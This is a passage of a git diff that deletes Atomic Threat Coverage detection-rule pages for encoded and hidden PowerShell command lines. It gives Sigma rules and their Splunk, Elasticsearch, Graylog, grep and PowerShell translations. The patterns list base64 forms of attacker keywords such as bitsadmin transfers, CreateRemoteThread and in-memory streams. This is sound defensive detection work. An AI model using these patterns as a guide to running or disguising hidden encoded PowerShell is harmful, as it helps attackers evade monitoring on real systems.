-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Encoded PowerShell Command Line'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(* \-e JAB* * \-e  JAB* * \-e   JAB* * \-e    JAB* * \-e     JAB* * \-e      JAB* * \-en JAB* * \-enc JAB* * \-enc* JAB* * \-w hidden \-e* JAB* * BA\^J e\- * \-e SUVYI* * \-e aWV4I* * \-e SQBFAFgA* * \-e aQBlAHgA* * \-enc SUVYI* * \-enc aWV4I* * \-enc SQBFAFgA* * \-enc aQBlAHgA*) AND (NOT (CommandLine.keyword:* \-ExecutionPolicy remotesigned *)))
-```
-
-
-### splunk
-    
-```
-((CommandLine="* -e JAB*" OR CommandLine="* -e  JAB*" OR CommandLine="* -e   JAB*" OR CommandLine="* -e    JAB*" OR CommandLine="* -e     JAB*" OR CommandLine="* -e      JAB*" OR CommandLine="* -en JAB*" OR CommandLine="* -enc JAB*" OR CommandLine="* -enc* JAB*" OR CommandLine="* -w hidden -e* JAB*" OR CommandLine="* BA^J e-" OR CommandLine="* -e SUVYI*" OR CommandLine="* -e aWV4I*" OR CommandLine="* -e SQBFAFgA*" OR CommandLine="* -e aQBlAHgA*" OR CommandLine="* -enc SUVYI*" OR CommandLine="* -enc aWV4I*" OR CommandLine="* -enc SQBFAFgA*" OR CommandLine="* -enc aQBlAHgA*") NOT (CommandLine="* -ExecutionPolicy remotesigned *"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -e JAB*", "* -e  JAB*", "* -e   JAB*", "* -e    JAB*", "* -e     JAB*", "* -e      JAB*", "* -en JAB*", "* -enc JAB*", "* -enc* JAB*", "* -w hidden -e* JAB*", "* BA^J e-", "* -e SUVYI*", "* -e aWV4I*", "* -e SQBFAFgA*", "* -e aQBlAHgA*", "* -enc SUVYI*", "* -enc aWV4I*", "* -enc SQBFAFgA*", "* -enc aQBlAHgA*"]  -(CommandLine="* -ExecutionPolicy remotesigned *"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.* -e JAB.*|.*.* -e  JAB.*|.*.* -e   JAB.*|.*.* -e    JAB.*|.*.* -e     JAB.*|.*.* -e      JAB.*|.*.* -en JAB.*|.*.* -enc JAB.*|.*.* -enc.* JAB.*|.*.* -w hidden -e.* JAB.*|.*.* BA\^J e-|.*.* -e SUVYI.*|.*.* -e aWV4I.*|.*.* -e SQBFAFgA.*|.*.* -e aQBlAHgA.*|.*.* -enc SUVYI.*|.*.* -enc aWV4I.*|.*.* -enc SQBFAFgA.*|.*.* -enc aQBlAHgA.*))(?=.*(?!.*(?:.*(?=.*.* -ExecutionPolicy remotesigned .*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_hidden_b64_cmd.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_hidden_b64_cmd.md
deleted file mode 100644
index 6715cd8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_hidden_b64_cmd.md
+++ /dev/null
@@ -1,225 +0,0 @@
-| Title                    | Malicious Base64 Encoded PowerShell Keywords in Command Lines       |
-|:-------------------------|:------------------|
-| **Description**          | Detects base64 encoded strings used in hidden malicious PowerShell command lines |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/](http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/)</li></ul>  |
-| **Author**               | John Lambert (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
-id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
-status: experimental
-description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
-references:
-    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: John Lambert (rule)
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    encoded:
-        Image: '*\powershell.exe'
-        CommandLine: '* hidden *'
-    selection:
-        CommandLine:
-            - '*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA*'
-            - '*aXRzYWRtaW4gL3RyYW5zZmVy*'
-            - '*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA*'
-            - '*JpdHNhZG1pbiAvdHJhbnNmZX*'
-            - '*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg*'
-            - '*Yml0c2FkbWluIC90cmFuc2Zlc*'
-            - '*AGMAaAB1AG4AawBfAHMAaQB6AGUA*'
-            - '*JABjAGgAdQBuAGsAXwBzAGkAegBlA*'
-            - '*JGNodW5rX3Npem*'
-            - '*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ*'
-            - '*RjaHVua19zaXpl*'
-            - '*Y2h1bmtfc2l6Z*'
-            - '*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A*'
-            - '*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg*'
-            - '*lPLkNvbXByZXNzaW9u*'
-            - '*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA*'
-            - '*SU8uQ29tcHJlc3Npb2*'
-            - '*Ty5Db21wcmVzc2lvb*'
-            - '*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ*'
-            - '*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA*'
-            - '*lPLk1lbW9yeVN0cmVhb*'
-            - '*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A*'
-            - '*SU8uTWVtb3J5U3RyZWFt*'
-            - '*Ty5NZW1vcnlTdHJlYW*'
-            - '*4ARwBlAHQAQwBoAHUAbgBrA*'
-            - '*5HZXRDaHVua*'
-            - '*AEcAZQB0AEMAaAB1AG4Aaw*'
-            - '*LgBHAGUAdABDAGgAdQBuAGsA*'
-            - '*LkdldENodW5r*'
-            - '*R2V0Q2h1bm*'
-            - '*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A*'
-            - '*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA*'
-            - '*RIUkVBRF9JTkZPNj*'
-            - '*SFJFQURfSU5GTzY0*'
-            - '*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA*'
-            - '*VEhSRUFEX0lORk82N*'
-            - '*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA*'
-            - '*cmVhdGVSZW1vdGVUaHJlYW*'
-            - '*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA*'
-            - '*NyZWF0ZVJlbW90ZVRocmVhZ*'
-            - '*Q3JlYXRlUmVtb3RlVGhyZWFk*'
-            - '*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA*'
-            - '*0AZQBtAG0AbwB2AGUA*'
-            - '*1lbW1vdm*'
-            - '*AGUAbQBtAG8AdgBlA*'
-            - '*bQBlAG0AbQBvAHYAZQ*'
-            - '*bWVtbW92Z*'
-            - '*ZW1tb3Zl*'
-    condition: encoded and selection
-falsepositives:
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\powershell.exe" -and $_.message -match "CommandLine.*.* hidden .*" -and ($_.message -match "CommandLine.*.*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA.*" -or $_.message -match "CommandLine.*.*aXRzYWRtaW4gL3RyYW5zZmVy.*" -or $_.message -match "CommandLine.*.*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA.*" -or $_.message -match "CommandLine.*.*JpdHNhZG1pbiAvdHJhbnNmZX.*" -or $_.message -match "CommandLine.*.*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg.*" -or $_.message -match "CommandLine.*.*Yml0c2FkbWluIC90cmFuc2Zlc.*" -or $_.message -match "CommandLine.*.*AGMAaAB1AG4AawBfAHMAaQB6AGUA.*" -or $_.message -match "CommandLine.*.*JABjAGgAdQBuAGsAXwBzAGkAegBlA.*" -or $_.message -match "CommandLine.*.*JGNodW5rX3Npem.*" -or $_.message -match "CommandLine.*.*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ.*" -or $_.message -match "CommandLine.*.*RjaHVua19zaXpl.*" -or $_.message -match "CommandLine.*.*Y2h1bmtfc2l6Z.*" -or $_.message -match "CommandLine.*.*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A.*" -or $_.message -match "CommandLine.*.*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg.*" -or $_.message -match "CommandLine.*.*lPLkNvbXByZXNzaW9u.*" -or $_.message -match "CommandLine.*.*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA.*" -or $_.message -match "CommandLine.*.*SU8uQ29tcHJlc3Npb2.*" -or $_.message -match "CommandLine.*.*Ty5Db21wcmVzc2lvb.*" -or $_.message -match "CommandLine.*.*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ.*" -or $_.message -match "CommandLine.*.*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA.*" -or $_.message -match "CommandLine.*.*lPLk1lbW9yeVN0cmVhb.*" -or $_.message -match "CommandLine.*.*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A.*" -or $_.message -match "CommandLine.*.*SU8uTWVtb3J5U3RyZWFt.*" -or $_.message -match "CommandLine.*.*Ty5NZW1vcnlTdHJlYW.*" -or $_.message -match "CommandLine.*.*4ARwBlAHQAQwBoAHUAbgBrA.*" -or $_.message -match "CommandLine.*.*5HZXRDaHVua.*" -or $_.message -match "CommandLine.*.*AEcAZQB0AEMAaAB1AG4Aaw.*" -or $_.message -match "CommandLine.*.*LgBHAGUAdABDAGgAdQBuAGsA.*" -or $_.message -match "CommandLine.*.*LkdldENodW5r.*" -or $_.message -match "CommandLine.*.*R2V0Q2h1bm.*" -or $_.message -match "CommandLine.*.*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A.*" -or $_.message -match "CommandLine.*.*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA.*" -or $_.message -match "CommandLine.*.*RIUkVBRF9JTkZPNj.*" -or $_.message -match "CommandLine.*.*SFJFQURfSU5GTzY0.*" -or $_.message -match "CommandLine.*.*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA.*" -or $_.message -match "CommandLine.*.*VEhSRUFEX0lORk82N.*" -or $_.message -match "CommandLine.*.*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA.*" -or $_.message -match "CommandLine.*.*cmVhdGVSZW1vdGVUaHJlYW.*" -or $_.message -match "CommandLine.*.*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA.*" -or $_.message -match "CommandLine.*.*NyZWF0ZVJlbW90ZVRocmVhZ.*" -or $_.message -match "CommandLine.*.*Q3JlYXRlUmVtb3RlVGhyZWFk.*" -or $_.message -match "CommandLine.*.*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA.*" -or $_.message -match "CommandLine.*.*0AZQBtAG0AbwB2AGUA.*" -or $_.message -match "CommandLine.*.*1lbW1vdm.*" -or $_.message -match "CommandLine.*.*AGUAbQBtAG8AdgBlA.*" -or $_.message -match "CommandLine.*.*bQBlAG0AbQBvAHYAZQ.*" -or $_.message -match "CommandLine.*.*bWVtbW92Z.*" -or $_.message -match "CommandLine.*.*ZW1tb3Zl.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:*\ hidden\ * AND winlog.event_data.CommandLine.keyword:(*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA* OR *aXRzYWRtaW4gL3RyYW5zZmVy* OR *IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA* OR *JpdHNhZG1pbiAvdHJhbnNmZX* OR *YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg* OR *Yml0c2FkbWluIC90cmFuc2Zlc* OR *AGMAaAB1AG4AawBfAHMAaQB6AGUA* OR *JABjAGgAdQBuAGsAXwBzAGkAegBlA* OR *JGNodW5rX3Npem* OR *QAYwBoAHUAbgBrAF8AcwBpAHoAZQ* OR *RjaHVua19zaXpl* OR *Y2h1bmtfc2l6Z* OR *AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A* OR *kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg* OR *lPLkNvbXByZXNzaW9u* OR *SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA* OR *SU8uQ29tcHJlc3Npb2* OR *Ty5Db21wcmVzc2lvb* OR *AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ* OR *kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA* OR *lPLk1lbW9yeVN0cmVhb* OR *SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A* OR *SU8uTWVtb3J5U3RyZWFt* OR *Ty5NZW1vcnlTdHJlYW* OR *4ARwBlAHQAQwBoAHUAbgBrA* OR *5HZXRDaHVua* OR *AEcAZQB0AEMAaAB1AG4Aaw* OR *LgBHAGUAdABDAGgAdQBuAGsA* OR *LkdldENodW5r* OR *R2V0Q2h1bm* OR *AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A* OR *QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA* OR *RIUkVBRF9JTkZPNj* OR *SFJFQURfSU5GTzY0* OR *VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA* OR *VEhSRUFEX0lORk82N* OR *AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA* OR *cmVhdGVSZW1vdGVUaHJlYW* OR *MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA* OR *NyZWF0ZVJlbW90ZVRocmVhZ* OR *Q3JlYXRlUmVtb3RlVGhyZWFk* OR *QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA* OR *0AZQBtAG0AbwB2AGUA* OR *1lbW1vdm* OR *AGUAbQBtAG8AdgBlA* OR *bQBlAG0AbQBvAHYAZQ* OR *bWVtbW92Z* OR *ZW1tb3Zl*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f26c6093-6f14-4b12-800f-0fcb46f5ffd0 <<EOF
-{
-  "metadata": {
-    "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines",
-    "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*\\ hidden\\ * AND winlog.event_data.CommandLine.keyword:(*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA* OR *aXRzYWRtaW4gL3RyYW5zZmVy* OR *IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA* OR *JpdHNhZG1pbiAvdHJhbnNmZX* OR *YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg* OR *Yml0c2FkbWluIC90cmFuc2Zlc* OR *AGMAaAB1AG4AawBfAHMAaQB6AGUA* OR *JABjAGgAdQBuAGsAXwBzAGkAegBlA* OR *JGNodW5rX3Npem* OR *QAYwBoAHUAbgBrAF8AcwBpAHoAZQ* OR *RjaHVua19zaXpl* OR *Y2h1bmtfc2l6Z* OR *AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A* OR *kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg* OR *lPLkNvbXByZXNzaW9u* OR *SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA* OR *SU8uQ29tcHJlc3Npb2* OR *Ty5Db21wcmVzc2lvb* OR *AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ* OR *kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA* OR *lPLk1lbW9yeVN0cmVhb* OR *SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A* OR *SU8uTWVtb3J5U3RyZWFt* OR *Ty5NZW1vcnlTdHJlYW* OR *4ARwBlAHQAQwBoAHUAbgBrA* OR *5HZXRDaHVua* OR *AEcAZQB0AEMAaAB1AG4Aaw* OR *LgBHAGUAdABDAGgAdQBuAGsA* OR *LkdldENodW5r* OR *R2V0Q2h1bm* OR *AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A* OR *QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA* OR *RIUkVBRF9JTkZPNj* OR *SFJFQURfSU5GTzY0* OR *VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA* OR *VEhSRUFEX0lORk82N* OR *AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA* OR *cmVhdGVSZW1vdGVUaHJlYW* OR *MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA* OR *NyZWF0ZVJlbW90ZVRocmVhZ* OR *Q3JlYXRlUmVtb3RlVGhyZWFk* OR *QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA* OR *0AZQBtAG0AbwB2AGUA* OR *1lbW1vdm* OR *AGUAbQBtAG8AdgBlA* OR *bQBlAG0AbQBvAHYAZQ* OR *bWVtbW92Z* OR *ZW1tb3Zl*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*\\ hidden\\ * AND winlog.event_data.CommandLine.keyword:(*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA* OR *aXRzYWRtaW4gL3RyYW5zZmVy* OR *IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA* OR *JpdHNhZG1pbiAvdHJhbnNmZX* OR *YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg* OR *Yml0c2FkbWluIC90cmFuc2Zlc* OR *AGMAaAB1AG4AawBfAHMAaQB6AGUA* OR *JABjAGgAdQBuAGsAXwBzAGkAegBlA* OR *JGNodW5rX3Npem* OR *QAYwBoAHUAbgBrAF8AcwBpAHoAZQ* OR *RjaHVua19zaXpl* OR *Y2h1bmtfc2l6Z* OR *AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A* OR *kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg* OR *lPLkNvbXByZXNzaW9u* OR *SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA* OR *SU8uQ29tcHJlc3Npb2* OR *Ty5Db21wcmVzc2lvb* OR *AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ* OR *kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA* OR *lPLk1lbW9yeVN0cmVhb* OR *SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A* OR *SU8uTWVtb3J5U3RyZWFt* OR *Ty5NZW1vcnlTdHJlYW* OR *4ARwBlAHQAQwBoAHUAbgBrA* OR *5HZXRDaHVua* OR *AEcAZQB0AEMAaAB1AG4Aaw* OR *LgBHAGUAdABDAGgAdQBuAGsA* OR *LkdldENodW5r* OR *R2V0Q2h1bm* OR *AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A* OR *QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA* OR *RIUkVBRF9JTkZPNj* OR *SFJFQURfSU5GTzY0* OR *VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA* OR *VEhSRUFEX0lORk82N* OR *AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA* OR *cmVhdGVSZW1vdGVUaHJlYW* OR *MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA* OR *NyZWF0ZVJlbW90ZVRocmVhZ* OR *Q3JlYXRlUmVtb3RlVGhyZWFk* OR *QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA* OR *0AZQBtAG0AbwB2AGUA* OR *1lbW1vdm* OR *AGUAbQBtAG8AdgBlA* OR *bQBlAG0AbQBvAHYAZQ* OR *bWVtbW92Z* OR *ZW1tb3Zl*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious Base64 Encoded PowerShell Keywords in Command Lines'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\powershell.exe AND CommandLine.keyword:* hidden * AND CommandLine.keyword:(*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA* *aXRzYWRtaW4gL3RyYW5zZmVy* *IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA* *JpdHNhZG1pbiAvdHJhbnNmZX* *YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg* *Yml0c2FkbWluIC90cmFuc2Zlc* *AGMAaAB1AG4AawBfAHMAaQB6AGUA* *JABjAGgAdQBuAGsAXwBzAGkAegBlA* *JGNodW5rX3Npem* *QAYwBoAHUAbgBrAF8AcwBpAHoAZQ* *RjaHVua19zaXpl* *Y2h1bmtfc2l6Z* *AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A* *kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg* *lPLkNvbXByZXNzaW9u* *SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA* *SU8uQ29tcHJlc3Npb2* *Ty5Db21wcmVzc2lvb* *AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ* *kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA* *lPLk1lbW9yeVN0cmVhb* *SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A* *SU8uTWVtb3J5U3RyZWFt* *Ty5NZW1vcnlTdHJlYW* *4ARwBlAHQAQwBoAHUAbgBrA* *5HZXRDaHVua* *AEcAZQB0AEMAaAB1AG4Aaw* *LgBHAGUAdABDAGgAdQBuAGsA* *LkdldENodW5r* *R2V0Q2h1bm* *AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A* *QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA* *RIUkVBRF9JTkZPNj* *SFJFQURfSU5GTzY0* *VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA* *VEhSRUFEX0lORk82N* *AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA* *cmVhdGVSZW1vdGVUaHJlYW* *MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA* *NyZWF0ZVJlbW90ZVRocmVhZ* *Q3JlYXRlUmVtb3RlVGhyZWFk* *QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA* *0AZQBtAG0AbwB2AGUA* *1lbW1vdm* *AGUAbQBtAG8AdgBlA* *bQBlAG0AbQBvAHYAZQ* *bWVtbW92Z* *ZW1tb3Zl*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\powershell.exe" CommandLine="* hidden *" (CommandLine="*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA*" OR CommandLine="*aXRzYWRtaW4gL3RyYW5zZmVy*" OR CommandLine="*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA*" OR CommandLine="*JpdHNhZG1pbiAvdHJhbnNmZX*" OR CommandLine="*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg*" OR CommandLine="*Yml0c2FkbWluIC90cmFuc2Zlc*" OR CommandLine="*AGMAaAB1AG4AawBfAHMAaQB6AGUA*" OR CommandLine="*JABjAGgAdQBuAGsAXwBzAGkAegBlA*" OR CommandLine="*JGNodW5rX3Npem*" OR CommandLine="*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ*" OR CommandLine="*RjaHVua19zaXpl*" OR CommandLine="*Y2h1bmtfc2l6Z*" OR CommandLine="*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A*" OR CommandLine="*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg*" OR CommandLine="*lPLkNvbXByZXNzaW9u*" OR CommandLine="*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA*" OR CommandLine="*SU8uQ29tcHJlc3Npb2*" OR CommandLine="*Ty5Db21wcmVzc2lvb*" OR CommandLine="*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ*" OR CommandLine="*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA*" OR CommandLine="*lPLk1lbW9yeVN0cmVhb*" OR CommandLine="*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A*" OR CommandLine="*SU8uTWVtb3J5U3RyZWFt*" OR CommandLine="*Ty5NZW1vcnlTdHJlYW*" OR CommandLine="*4ARwBlAHQAQwBoAHUAbgBrA*" OR CommandLine="*5HZXRDaHVua*" OR CommandLine="*AEcAZQB0AEMAaAB1AG4Aaw*" OR CommandLine="*LgBHAGUAdABDAGgAdQBuAGsA*" OR CommandLine="*LkdldENodW5r*" OR CommandLine="*R2V0Q2h1bm*" OR CommandLine="*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A*" OR CommandLine="*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA*" OR CommandLine="*RIUkVBRF9JTkZPNj*" OR CommandLine="*SFJFQURfSU5GTzY0*" OR CommandLine="*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA*" OR CommandLine="*VEhSRUFEX0lORk82N*" OR CommandLine="*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA*" OR CommandLine="*cmVhdGVSZW1vdGVUaHJlYW*" OR CommandLine="*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA*" OR CommandLine="*NyZWF0ZVJlbW90ZVRocmVhZ*" OR CommandLine="*Q3JlYXRlUmVtb3RlVGhyZWFk*" OR CommandLine="*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA*" OR CommandLine="*0AZQBtAG0AbwB2AGUA*" OR CommandLine="*1lbW1vdm*" OR CommandLine="*AGUAbQBtAG8AdgBlA*" OR 